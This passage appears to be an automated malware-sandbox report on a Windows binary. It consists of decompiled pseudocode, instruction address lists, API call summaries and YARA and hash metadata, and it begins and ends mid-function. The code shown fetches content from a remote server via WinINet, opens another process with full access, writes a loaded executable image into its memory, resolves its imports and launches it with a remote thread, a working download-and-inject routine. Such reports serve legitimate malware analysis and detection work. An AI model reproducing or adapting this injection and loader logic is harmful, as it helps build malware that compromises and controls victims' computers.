										_t119 = 0x400;
										_t128 = E004015E0(0x400);
										_t140 = _t139 + 4;
										if(_t128 == 0) {
											_t126 = _v16;
											goto L25;
										} else {
											do {
												_t78 = InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24); // executed
												if(_t78 == 0) {
													if(GetLastError() != 0x7a) {
														E00401510(_t128);
														L23:
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														InternetCloseHandle(_v8);
														return 0;
													} else {
														_t119 = _t119 + 0x400;
														goto L17;
													}
												} else {
													_t87 = _v24;
													if(_t87 == 0) {
														InternetCloseHandle(_v16); // executed
														InternetCloseHandle(_v20);
														_t111 = _v8;
														InternetCloseHandle(_t111);
														_t91 = E004018D0(_t128, ";End");
														if(_t91 != 0) {
															 *_t91 = 0;
															return _t128;
														} else {
															E00401510(_t128);
															InternetCloseHandle(_v16);
															InternetCloseHandle(_v20);
															InternetCloseHandle(_t111);
															return 0;
														}
													} else {
														_t108 = _t108 + _t87;
														goto L17;
													}
												}
												goto L27;
												L17:
												_t128 = E004016A0(_t128, _t119 + _t108);
												_t140 = _t140 + 8;
											} while (_t128 != 0);
											goto L23;
										}
									}
								} else {
									_v12 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) {
										L25:
										InternetCloseHandle(_t126);
										goto L26;
									} else {
										_v12 = _v12 | 0x00000180;
										if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
											goto L25;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E00401510();
							InternetCloseHandle(_v8);
							return 0;
						}
					} else {
						E00401510(_t123);
						return 0;
					}
				} else {
					return _t55;
				}
				L27:
			}














































                                                                                                                                          0x00404b10
                                                                                                                                          0x00404b15
                                                                                                                                          0x00404b1e
                                                                                                                                          0x00404b25
                                                                                                                                          0x00404b27
                                                                                                                                          0x00404b2e
                                                                                                                                          0x00404b35
                                                                                                                                          0x00404b3f
                                                                                                                                          0x00404b46
                                                                                                                                          0x00404b4d
                                                                                                                                          0x00404b52
                                                                                                                                          0x00404b57
                                                                                                                                          0x00404b5f
                                                                                                                                          0x00404b75
                                                                                                                                          0x00404b7c
                                                                                                                                          0x00404b88
                                                                                                                                          0x00404b8d
                                                                                                                                          0x00404b9d
                                                                                                                                          0x00404ba3
                                                                                                                                          0x00404ba8
                                                                                                                                          0x00404bcb
                                                                                                                                          0x00404bd1
                                                                                                                                          0x00404bd4
                                                                                                                                          0x00404bd7
                                                                                                                                          0x00404bf4
                                                                                                                                          0x00404c04
                                                                                                                                          0x00404c09
                                                                                                                                          0x00404c0c
                                                                                                                                          0x00404c15
                                                                                                                                          0x00404c21
                                                                                                                                          0x00404c28
                                                                                                                                          0x00404c2b
                                                                                                                                          0x00404c38
                                                                                                                                          0x00404c47
                                                                                                                                          0x00404c52
                                                                                                                                          0x00404c58
                                                                                                                                          0x00404c5a
                                                                                                                                          0x00404c5f
                                                                                                                                          0x00404db8
                                                                                                                                          0x00404dbb
                                                                                                                                          0x00404dca
                                                                                                                                          0x00404dd4
                                                                                                                                          0x00404c65
                                                                                                                                          0x00404c6b
                                                                                                                                          0x00404c70
                                                                                                                                          0x00404c75
                                                                                                                                          0x00404cb8
                                                                                                                                          0x00404cc9
                                                                                                                                          0x00000000
                                                                                                                                          0x00404ccf
                                                                                                                                          0x00404ccf
                                                                                                                                          0x00404cda
                                                                                                                                          0x00404cdc
                                                                                                                                          0x00404ce1
                                                                                                                                          0x00404dad
                                                                                                                                          0x00000000
                                                                                                                                          0x00404ce7
                                                                                                                                          0x00404ce7
                                                                                                                                          0x00404cf3
                                                                                                                                          0x00404cfb
                                                                                                                                          0x00404d11
                                                                                                                                          0x00404d86
                                                                                                                                          0x00404d8e
                                                                                                                                          0x00404d9a
                                                                                                                                          0x00404d9f
                                                                                                                                          0x00404da2
                                                                                                                                          0x00404dac
                                                                                                                                          0x00404d13
                                                                                                                                          0x00404d13
                                                                                                                                          0x00000000
                                                                                                                                          0x00404d13
                                                                                                                                          0x00404cfd
                                                                                                                                          0x00404cfd
                                                                                                                                          0x00404d02
                                                                                                                                          0x00404d31
                                                                                                                                          0x00404d40
                                                                                                                                          0x00404d42
                                                                                                                                          0x00404d46
                                                                                                                                          0x00404d4e
                                                                                                                                          0x00404d58
                                                                                                                                          0x00404d79
                                                                                                                                          0x00404d84
                                                                                                                                          0x00404d5a
                                                                                                                                          0x00404d5b
                                                                                                                                          0x00404d66
                                                                                                                                          0x00404d6b
                                                                                                                                          0x00404d6e
                                                                                                                                          0x00404d78
                                                                                                                                          0x00404d78
                                                                                                                                          0x00404d04
                                                                                                                                          0x00404d04
                                                                                                                                          0x00000000
                                                                                                                                          0x00404d04
                                                                                                                                          0x00404d02
                                                                                                                                          0x00000000
                                                                                                                                          0x00404d19
                                                                                                                                          0x00404d23
                                                                                                                                          0x00404d25
                                                                                                                                          0x00404d28
                                                                                                                                          0x00000000
                                                                                                                                          0x00404d2c
                                                                                                                                          0x00404ce1
                                                                                                                                          0x00404c77
                                                                                                                                          0x00404c7a
                                                                                                                                          0x00404c81
                                                                                                                                          0x00404c94
                                                                                                                                          0x00404db0
                                                                                                                                          0x00404db6
                                                                                                                                          0x00000000
                                                                                                                                          0x00404c9a
                                                                                                                                          0x00404c9a
                                                                                                                                          0x00404cb2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404cb2
                                                                                                                                          0x00404c94
                                                                                                                                          0x00404c75
                                                                                                                                          0x00404bd9
                                                                                                                                          0x00404bd9
                                                                                                                                          0x00404be5
                                                                                                                                          0x00404bf3
                                                                                                                                          0x00404bf3
                                                                                                                                          0x00404baa
                                                                                                                                          0x00404bab
                                                                                                                                          0x00404bbb
                                                                                                                                          0x00404bbb
                                                                                                                                          0x00404b66
                                                                                                                                          0x00404b66
                                                                                                                                          0x00404b66
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • InternetCrackUrlA.WININET(74B5EA30,00000000,?), ref: 00404B57
                                                                                                                                          • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Internet$CrackOpen
                                                                                                                                          • String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                                                          • API String ID: 1262293563-2187584305
                                                                                                                                          • Opcode ID: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
                                                                                                                                          • Instruction ID: b075b86cb3f3238e1b45add10c95dfbc6438ce08dd21614d055a406b181498c9
                                                                                                                                          • Opcode Fuzzy Hash: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
                                                                                                                                          • Instruction Fuzzy Hash: D381B971E002097BEB11ABA1EC45FAF77B8EF84754F100176FA04F62D1D7799D108AA9
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004029E0, Relevance: 37.8, APIs: 25, Instructions: 322nativememorythreadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                          			E004029E0(void* __ecx, void* _a4, intOrPtr _a8, void* _a12, long _a16, DWORD* _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				long _v28;
				CHAR* _v32;
				struct HINSTANCE__* _v36;
				long* _v40;
				long _v44;
				void* _v48;
				long _v52;
				void* _v56;
				long _v60;
				long _v64;
				long _v68;
				long _v72;
				long _v76;
				void* _v80;
				long* _t104;
				long _t111;
				void* _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				CHAR* _t128;
				signed short _t131;
				CHAR* _t133;
				_Unknown_base(*)()* _t134;
				long* _t135;
				intOrPtr _t136;
				CHAR* _t137;
				long* _t140;
				CHAR* _t141;
				CHAR* _t146;
				long _t148;
				CHAR* _t149;
				CHAR* _t160;
				long _t163;
				CHAR** _t164;
				void* _t167;
				void* _t169;
				void* _t172;
				struct HINSTANCE__* _t175;
				void* _t176;
				signed int _t177;
				CHAR* _t179;
				signed int _t184;
				CHAR* _t187;
				_Unknown_base(*)()** _t189;
				void* _t191;
				CHAR* _t192;
				CHAR* _t194;
				long* _t195;
				void* _t197;
				signed short* _t198;
				CHAR** _t200;
				long _t201;
				void* _t203;
				void* _t204;

				_t172 = __ecx;
				_t104 = _a20;
				_t185 = _a4;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = 0;
				_v20 = 0;
				_v48 = 0;
				_v44 = 0;
				 *_t104 = 0;
				RtlImageNtHeader(_a4);
				_t195 = _t104;
				_v40 = _t195;
				if( *_t195 != 0x4550) {
					L5:
					return 0;
				} else {
					_v28 = _t195[0x14];
					_v56 = _a8;
					_v80 = 0x18;
					_v76 = 0;
					_v68 = 0;
					_v72 = 0;
					_v64 = 0;
					_v60 = 0;
					_v52 = 0;
					_t111 = NtOpenProcess( &_v8, 0x1fffff,  &_v80,  &_v56);
					if(_t111 != 0) {
						goto L5;
					} else {
						if( *0x5d1314 == _t111) {
							L6:
							_t114 = NtAllocateVirtualMemory(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40); // executed
							__eflags = _t114;
							if(_t114 != 0) {
								goto L4;
							} else {
								_t116 = VirtualAlloc(_t114, _v28, 0x3000, 0x40); // executed
								_t169 = _t116;
								__eflags = _t169;
								if(_t169 == 0) {
									L43:
									__eflags = _v12;
									if(_v12 != 0) {
										 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
									}
									_t117 = _v8;
									__eflags = _t117;
									if(_t117 != 0) {
										NtClose(_t117);
										_t117 = _v8;
									}
									__eflags = _t169;
									if(_t169 != 0) {
										VirtualFree(_t169, 0, 0x8000);
										_t117 = _v8;
									}
									__eflags = _v24;
									_v20 = 0;
									if(_v24 != 0) {
										 *0x5d10ac(_t117,  &_v24,  &_v20, 0x8000);
									}
									_t118 = _v16;
									__eflags = _t118;
									if(_t118 != 0) {
										NtClose(_t118);
									}
									__eflags = 0;
									return 0;
								} else {
									E00401640(_t169, _t185, _v28);
									_t204 = _t203 + 0xc;
									_t187 = _t169 + _t195[0x20];
									__eflags = _t187;
									while(1) {
										_t128 = _t187[0xc];
										_v32 = _t187;
										__eflags = _t128;
										if(_t128 != 0) {
											goto L11;
										}
										__eflags = _t187[4] - _t128;
										if(_t187[4] == _t128) {
											_t135 = _v40;
											_t176 = _v12;
											_t191 = _a4;
											_t45 = _t135 + 0xa0; // 0x45dd842a
											_t46 = _t135 + 0x34; // 0x0
											_t136 =  *_t46;
											_t200 =  *_t45 + _t169;
											_v40 = _t176 - _t136;
											__eflags =  *_t200;
											_v36 = _t191 - _t136;
											if( *_t200 != 0) {
												do {
													_t192 = _t200[1];
													_t50 =  &(_t200[1]); // 0x45dd842e
													_t164 = _t50;
													_v32 = _t164;
													__eflags = _t192 - 8;
													if(_t192 >= 8) {
														_t184 = 0;
														_t194 =  &(_t192[0xfffffffffffffff8]) >> 1;
														__eflags = _t194;
														if(_t194 != 0) {
															asm("o16 nop [eax+eax]");
															do {
																_t177 =  *(_t200 + 8 + _t184 * 2) & 0x0000ffff;
																__eflags = _t177;
																if(_t177 != 0) {
																	_t179 =  &(( *_t200)[_t177 & 0x00000fff]);
																	_t57 =  &(_t179[_t169]);
																	 *_t57 = _t179[_t169] + _v40 - _v36;
																	__eflags =  *_t57;
																}
																_t184 = _t184 + 1;
																__eflags = _t184 - _t194;
															} while (_t184 < _t194);
															_t164 = _v32;
														}
													}
													_t200 = _t200 +  *_t164;
													__eflags =  *_t200;
												} while ( *_t200 != 0);
												_t176 = _v12;
												_t191 = _a4;
											}
											_t137 = NtWriteVirtualMemory(_v8, _t176, _t169, _v28, 0); // executed
											__eflags = _t137;
											if(_t137 < 0) {
												goto L43;
											} else {
												_t201 = _a16;
												_t140 = NtAllocateVirtualMemory(_v8,  &_v24, 0,  &_a16, 0x3000, 4); // executed
												__eflags = _t140;
												if(_t140 != 0) {
													goto L43;
												} else {
													_t141 = NtWriteVirtualMemory(_v8, _v24, _a12, _t201, _t140); // executed
													__eflags = _t141;
													if(_t141 < 0) {
														goto L43;
													} else {
														_t146 = RtlCreateUserThread(_v8, 0, 0, 0, 0, 0, _v12 - _t191 + _a24, _v24,  &_v16, 0); // executed
														__eflags = _t146;
														if(_t146 < 0) {
															goto L43;
														} else {
															asm("xorps xmm0, xmm0");
															asm("movlpd [ebp-0x2c], xmm0");
															_t148 = NtWaitForSingleObject(_v16, 0,  &_v48);
															__eflags = _t148 - 0x102;
															if(_t148 == 0x102) {
																while(1) {
																	_t160 =  *0x5d2118; // 0x0
																	__eflags = _t160;
																	if(_t160 != 0) {
																		break;
																	}
																	Sleep(0xbb8); // executed
																	_t163 = NtWaitForSingleObject(_v16, 0,  &_v48);
																	__eflags = _t163 - 0x102;
																	if(_t163 == 0x102) {
																		continue;
																	} else {
																	}
																	goto L41;
																}
																TerminateThread(_v16, 0);
															}
															L41:
															_t149 = GetExitCodeThread(_v16, _a20);
															__eflags = _t149;
															if(_t149 == 0) {
																goto L43;
															} else {
																NtClose(_v16);
																 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
																NtClose(_v8);
																VirtualFree(_t169, 0, 0x8000);
																_v20 = 0;
																 *0x5d10ac(_v8,  &_v24,  &_v20, 0x8000);
																return 1;
															}
														}
													}
												}
											}
										} else {
											goto L11;
										}
										goto L54;
										L11:
										_t175 = E00408B00( &(_t128[_t169]));
										_t204 = _t204 + 4;
										_v36 = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L43;
										} else {
											_t197 = _t169 +  *_t187;
											_t189 = _t169 + _t187[0x10];
											__eflags = _t197 - _t169;
											_t198 =  ==  ? _t189 : _t197;
											__eflags = _t198 - _t169;
											if(_t198 == _t169) {
												goto L43;
											} else {
												_t131 =  *_t198;
												__eflags = _t131;
												if(__eflags == 0) {
													L19:
													_t187 =  &(_v32[0x14]);
													continue;
												} else {
													L14:
													L14:
													if(__eflags >= 0) {
														_t133 = _t131 + 2 + _t169;
														__eflags = _t133;
													} else {
														_t133 = _t131 & 0x0000ffff;
													}
													_t134 = GetProcAddress(_t175, _t133);
													 *_t189 = _t134;
													__eflags = _t134;
													if(_t134 == 0) {
														goto L43;
													}
													_t131 = _t198[2];
													_t198 =  &(_t198[2]);
													_t175 = _v36;
													_t189 = _t189 + 4;
													__eflags = _t131;
													if(__eflags != 0) {
														goto L14;
													} else {
														goto L19;
													}
												}
											}
										}
										goto L54;
									}
								}
							}
						} else {
							_t167 = E00408270(_t172, _v8);
							_t203 = _t203 + 4;
							if(_t167 != 0) {
								goto L6;
							} else {
								L4:
								NtClose(_v8);
								goto L5;
							}
						}
					}
				}
				L54:
			}































































                                                                                                                                          0x004029e0
                                                                                                                                          0x004029e6
                                                                                                                                          0x004029eb
                                                                                                                                          0x004029ef
                                                                                                                                          0x004029f6
                                                                                                                                          0x004029fd
                                                                                                                                          0x00402a04
                                                                                                                                          0x00402a0b
                                                                                                                                          0x00402a12
                                                                                                                                          0x00402a19
                                                                                                                                          0x00402a20
                                                                                                                                          0x00402a27
                                                                                                                                          0x00402a2d
                                                                                                                                          0x00402a33
                                                                                                                                          0x00402a35
                                                                                                                                          0x00402a3e
                                                                                                                                          0x00402ab9
                                                                                                                                          0x00402abf
                                                                                                                                          0x00402a40
                                                                                                                                          0x00402a43
                                                                                                                                          0x00402a49
                                                                                                                                          0x00402a53
                                                                                                                                          0x00402a63
                                                                                                                                          0x00402a6b
                                                                                                                                          0x00402a72
                                                                                                                                          0x00402a79
                                                                                                                                          0x00402a80
                                                                                                                                          0x00402a87
                                                                                                                                          0x00402a8e
                                                                                                                                          0x00402a96
                                                                                                                                          0x00000000
                                                                                                                                          0x00402a98
                                                                                                                                          0x00402a9e
                                                                                                                                          0x00402ac0
                                                                                                                                          0x00402ad4
                                                                                                                                          0x00402ada
                                                                                                                                          0x00402adc
                                                                                                                                          0x00000000
                                                                                                                                          0x00402ade
                                                                                                                                          0x00402aea
                                                                                                                                          0x00402af0
                                                                                                                                          0x00402af2
                                                                                                                                          0x00402af4
                                                                                                                                          0x00402d49
                                                                                                                                          0x00402d49
                                                                                                                                          0x00402d4d
                                                                                                                                          0x00402d5f
                                                                                                                                          0x00402d5f
                                                                                                                                          0x00402d65
                                                                                                                                          0x00402d68
                                                                                                                                          0x00402d6a
                                                                                                                                          0x00402d6d
                                                                                                                                          0x00402d73
                                                                                                                                          0x00402d73
                                                                                                                                          0x00402d76
                                                                                                                                          0x00402d78
                                                                                                                                          0x00402d82
                                                                                                                                          0x00402d88
                                                                                                                                          0x00402d88
                                                                                                                                          0x00402d8b
                                                                                                                                          0x00402d8f
                                                                                                                                          0x00402d96
                                                                                                                                          0x00402da6
                                                                                                                                          0x00402da6
                                                                                                                                          0x00402dac
                                                                                                                                          0x00402daf
                                                                                                                                          0x00402db1
                                                                                                                                          0x00402db4
                                                                                                                                          0x00402db4
                                                                                                                                          0x00402dbc
                                                                                                                                          0x00402dc2
                                                                                                                                          0x00402afa
                                                                                                                                          0x00402aff
                                                                                                                                          0x00402b0a
                                                                                                                                          0x00402b0d
                                                                                                                                          0x00402b0d
                                                                                                                                          0x00402b0f
                                                                                                                                          0x00402b0f
                                                                                                                                          0x00402b12
                                                                                                                                          0x00402b15
                                                                                                                                          0x00402b17
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b19
                                                                                                                                          0x00402b1c
                                                                                                                                          0x00402b88
                                                                                                                                          0x00402b8b
                                                                                                                                          0x00402b90
                                                                                                                                          0x00402b93
                                                                                                                                          0x00402b99
                                                                                                                                          0x00402b99
                                                                                                                                          0x00402b9c
                                                                                                                                          0x00402ba0
                                                                                                                                          0x00402ba7
                                                                                                                                          0x00402baa
                                                                                                                                          0x00402bad
                                                                                                                                          0x00402bb0
                                                                                                                                          0x00402bb0
                                                                                                                                          0x00402bb3
                                                                                                                                          0x00402bb3
                                                                                                                                          0x00402bb6
                                                                                                                                          0x00402bb9
                                                                                                                                          0x00402bbc
                                                                                                                                          0x00402bc1
                                                                                                                                          0x00402bc6
                                                                                                                                          0x00402bc6
                                                                                                                                          0x00402bc8
                                                                                                                                          0x00402bca
                                                                                                                                          0x00402bd0
                                                                                                                                          0x00402bd0
                                                                                                                                          0x00402bd5
                                                                                                                                          0x00402bd8
                                                                                                                                          0x00402be3
                                                                                                                                          0x00402be8
                                                                                                                                          0x00402be8
                                                                                                                                          0x00402be8
                                                                                                                                          0x00402be8
                                                                                                                                          0x00402beb
                                                                                                                                          0x00402bec
                                                                                                                                          0x00402bec
                                                                                                                                          0x00402bf0
                                                                                                                                          0x00402bf0
                                                                                                                                          0x00402bc8
                                                                                                                                          0x00402bf3
                                                                                                                                          0x00402bf5
                                                                                                                                          0x00402bf5
                                                                                                                                          0x00402bfa
                                                                                                                                          0x00402bfd
                                                                                                                                          0x00402bfd
                                                                                                                                          0x00402c0a
                                                                                                                                          0x00402c10
                                                                                                                                          0x00402c12
                                                                                                                                          0x00000000
                                                                                                                                          0x00402c18
                                                                                                                                          0x00402c18
                                                                                                                                          0x00402c2f
                                                                                                                                          0x00402c35
                                                                                                                                          0x00402c37
                                                                                                                                          0x00000000
                                                                                                                                          0x00402c3d
                                                                                                                                          0x00402c48
                                                                                                                                          0x00402c4e
                                                                                                                                          0x00402c50
                                                                                                                                          0x00000000
                                                                                                                                          0x00402c56
                                                                                                                                          0x00402c75
                                                                                                                                          0x00402c7b
                                                                                                                                          0x00402c7d
                                                                                                                                          0x00000000
                                                                                                                                          0x00402c83
                                                                                                                                          0x00402c86
                                                                                                                                          0x00402c8f
                                                                                                                                          0x00402c94
                                                                                                                                          0x00402c9a
                                                                                                                                          0x00402c9f
                                                                                                                                          0x00402ca7
                                                                                                                                          0x00402ca7
                                                                                                                                          0x00402cac
                                                                                                                                          0x00402cae
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00402cb5
                                                                                                                                          0x00402cc0
                                                                                                                                          0x00402cc6
                                                                                                                                          0x00402ccb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00402ccd
                                                                                                                                          0x00000000
                                                                                                                                          0x00402ccb
                                                                                                                                          0x00402cd4
                                                                                                                                          0x00402cd4
                                                                                                                                          0x00402cda
                                                                                                                                          0x00402ce0
                                                                                                                                          0x00402ce6
                                                                                                                                          0x00402ce8
                                                                                                                                          0x00000000
                                                                                                                                          0x00402cea
                                                                                                                                          0x00402ced
                                                                                                                                          0x00402d03
                                                                                                                                          0x00402d0c
                                                                                                                                          0x00402d1a
                                                                                                                                          0x00402d28
                                                                                                                                          0x00402d37
                                                                                                                                          0x00402d48
                                                                                                                                          0x00402d48
                                                                                                                                          0x00402ce8
                                                                                                                                          0x00402c7d
                                                                                                                                          0x00402c50
                                                                                                                                          0x00402c37
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b1e
                                                                                                                                          0x00402b26
                                                                                                                                          0x00402b28
                                                                                                                                          0x00402b2b
                                                                                                                                          0x00402b2e
                                                                                                                                          0x00402b30
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b36
                                                                                                                                          0x00402b3b
                                                                                                                                          0x00402b3d
                                                                                                                                          0x00402b3f
                                                                                                                                          0x00402b41
                                                                                                                                          0x00402b44
                                                                                                                                          0x00402b46
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b4c
                                                                                                                                          0x00402b4c
                                                                                                                                          0x00402b4e
                                                                                                                                          0x00402b50
                                                                                                                                          0x00402b80
                                                                                                                                          0x00402b83
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b52
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b52
                                                                                                                                          0x00402b52
                                                                                                                                          0x00402b5c
                                                                                                                                          0x00402b5c
                                                                                                                                          0x00402b54
                                                                                                                                          0x00402b54
                                                                                                                                          0x00402b54
                                                                                                                                          0x00402b60
                                                                                                                                          0x00402b66
                                                                                                                                          0x00402b68
                                                                                                                                          0x00402b6a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b70
                                                                                                                                          0x00402b73
                                                                                                                                          0x00402b76
                                                                                                                                          0x00402b79
                                                                                                                                          0x00402b7c
                                                                                                                                          0x00402b7e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b7e
                                                                                                                                          0x00402b50
                                                                                                                                          0x00402b46
                                                                                                                                          0x00000000
                                                                                                                                          0x00402b30
                                                                                                                                          0x00402b0f
                                                                                                                                          0x00402af4
                                                                                                                                          0x00402aa0
                                                                                                                                          0x00402aa3
                                                                                                                                          0x00402aa8
                                                                                                                                          0x00402aad
                                                                                                                                          0x00000000
                                                                                                                                          0x00402aaf
                                                                                                                                          0x00402aaf
                                                                                                                                          0x00402ab2
                                                                                                                                          0x00000000
                                                                                                                                          0x00402ab2
                                                                                                                                          0x00402aad
                                                                                                                                          0x00402a9e
                                                                                                                                          0x00402a96
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • RtlImageNtHeader.NTDLL(?), ref: 00402A2D
                                                                                                                                          • NtOpenProcess.NTDLL(00000000,001FFFFF,?,?), ref: 00402A8E
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00402AB2
                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000040), ref: 00402AD4
                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040,00000000), ref: 00402AEA
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00402B60
                                                                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C0A
                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000004), ref: 00402C2F
                                                                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C48
                                                                                                                                          • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00402C75
                                                                                                                                          • NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402C94
                                                                                                                                          • Sleep.KERNELBASE(00000BB8), ref: 00402CB5
                                                                                                                                          • NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402CC0
                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 00402CD4
                                                                                                                                          • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00402CE0
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00402CED
                                                                                                                                          • NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D03
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00402D0C
                                                                                                                                            • Part of subcall function 00408270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
                                                                                                                                            • Part of subcall function 00408270: GetProcAddress.KERNEL32(00000000), ref: 0040828C
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D1A
                                                                                                                                          • NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D37
                                                                                                                                          • NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D5F
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00402D6D
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D82
                                                                                                                                          • NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402DA6
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00402DB4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$Memory$Free$Close$Thread$AddressAllocateObjectProcSingleWaitWrite$AllocCodeCreateExitHandleHeaderImageModuleOpenProcessSleepTerminateUser
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4217436290-0
                                                                                                                                          • Opcode ID: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
                                                                                                                                          • Instruction ID: aa250f91bc0df1c709c0f0294cc1af27058bb64088126e2459afa89f473692c1
                                                                                                                                          • Opcode Fuzzy Hash: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
                                                                                                                                          • Instruction Fuzzy Hash: 53C14C71A01209EFDB20DF95DD49BEEBBB9FF04300F14406AE905B6290D775AE44DB98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00406340, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 206nativefilememoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                          			E00406340(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				void* _v36;
				long _v40;
				long _v44;
				intOrPtr _v48;
				char* _v52;
				long _v56;
				void* _v60;
				long _v64;
				void* _v68;
				char _v76;
				char _v84;
				short _v1108;
				long _t59;
				long _t69;
				long* _t70;
				void* _t71;
				void* _t74;
				long _t83;
				signed int _t85;
				void* _t90;
				void* _t109;

				_v8 = 0;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				_v60 = 0;
				asm("movups [ebp-0x34], xmm0");
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v68 = 0;
				_v64 = 0;
				asm("movq [ebp-0x48], xmm0");
				asm("movq [ebp-0x50], xmm0");
				_t59 = GetModuleFileNameW(0,  &_v1108, 0x200);
				if(_t59 == 0 || _t59 == 0x200) {
					L6:
					return 0;
				} else {
					_push(0);
					_push(0);
					_push( &_v76);
					_push( &_v1108);
					if( *0x5d10b8() != 1) {
						goto L6;
					} else {
						_v60 = 0x18;
						_v52 =  &_v76;
						_v56 = 0;
						_v48 = 0x40;
						_v44 = 0;
						_v40 = 0;
						_t69 = NtCreateFile( &_v8, 0x120089,  &_v60,  &_v36,  &_v68, 0x80, 3, 1, 0x60, 0, 0); // executed
						if(_t69 != 0) {
							goto L6;
						} else {
							_t70 =  &_v28;
							__imp__GetFileSizeEx(_v8, _t70);
							if(_t70 != 0) {
								_t71 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
								_t109 = _t71;
								if(_t109 != 0) {
									_t74 =  *0x5d10bc(_v8, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, 0); // executed
									if(_t74 == 0) {
										NtClose(_v8); // executed
										_t104 = _a4;
										_push(0);
										_push(0);
										_push( &_v84);
										_push(_a4);
										if( *0x5d10b8() == 1) {
											_v60 = 0x18;
											_v52 =  &_v84;
											_v56 = 0;
											_v48 = 0x40;
											_v44 = 0;
											_v40 = 0;
